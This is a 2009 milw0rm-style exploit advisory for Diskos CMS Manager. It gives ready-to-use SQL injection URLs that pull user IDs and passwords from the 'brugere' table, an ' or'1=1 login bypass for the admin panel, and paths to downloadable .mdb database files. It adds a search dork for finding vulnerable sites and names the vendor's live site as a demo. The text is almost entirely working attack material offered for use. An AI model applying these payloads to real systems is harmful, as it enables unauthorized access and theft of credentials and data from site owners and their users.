42 lines
No EOL
1.8 KiB
Text
42 lines
No EOL
1.8 KiB
Text
************************************************************
|
|
** Diskos CMS Manager & multiple vulnerabilitiesS
|
|
************************************************************
|
|
** Prodcut: Diskos CMS Manager
|
|
** Home : http://www.diskos.dk
|
|
** Vunlerability : SQL Injection & admin byapass & database disclosure
|
|
** Dork : "Powered By diskos"
|
|
** inurl:"side.asp?kat=1"
|
|
************************************************************
|
|
** Discovred by: AnGeL25dZ
|
|
** Contact : angel25dz@gmail.com
|
|
** *********************************************************
|
|
** Greetz to : ALLAH
|
|
** All Members of H-T (http://h-t.cc/cc)
|
|
** All Members of Islam-attack.com
|
|
*************************************************************
|
|
******************** SQL Injection **************************
|
|
*************************************************************
|
|
** Exploit:
|
|
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
|
|
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
|
|
**
|
|
** Administration Login : http://[path]/diskos6/
|
|
**
|
|
**************************************************************
|
|
********************** Admin bypass **************************
|
|
**************************************************************
|
|
**
|
|
** Administration Login : http://[path]/diskos6/
|
|
** brugerid: ' or'1=1
|
|
** password: ' or'1=1
|
|
****************************************************************
|
|
******************** database disclosure **********************
|
|
****************************************************************
|
|
** http://[path]/db/log.mdb
|
|
** artikler_prod.mdb
|
|
** medlemmer.mdb
|
|
******************************************************************
|
|
** Live demo : http://www.diskos.dk/
|
|
****************************************************************
|
|
|
|
# milw0rm.com [2009-03-30] |